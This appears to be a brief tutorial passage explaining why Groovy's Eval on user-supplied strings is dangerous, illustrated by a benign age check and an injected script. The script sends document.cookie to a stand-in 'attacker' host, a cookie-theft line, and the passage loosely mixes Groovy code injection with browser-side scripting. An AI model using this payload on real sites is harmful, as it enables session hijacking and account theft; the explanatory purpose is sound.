Eval takes a string as Groovy code and attempts to execute that code.
For example, if the string was:
currentUser.age >= 18
Then this expression would evaluate the object currentUser.age and return true or false.
Because of this, someone could potentially exploit this dynamic evaluation of code to cause unexpected and/or undesired results.
For example, if a user was able to replace the string with:
<script>
window.location='<http://attacker/?cookie='+document.cookie>
</script>
Then the attacker is able to arbitrarily execute this code and potentially steal a cookie. Then they can impersonate the user they stole the cookie from and steal or cause harm to a user’s account.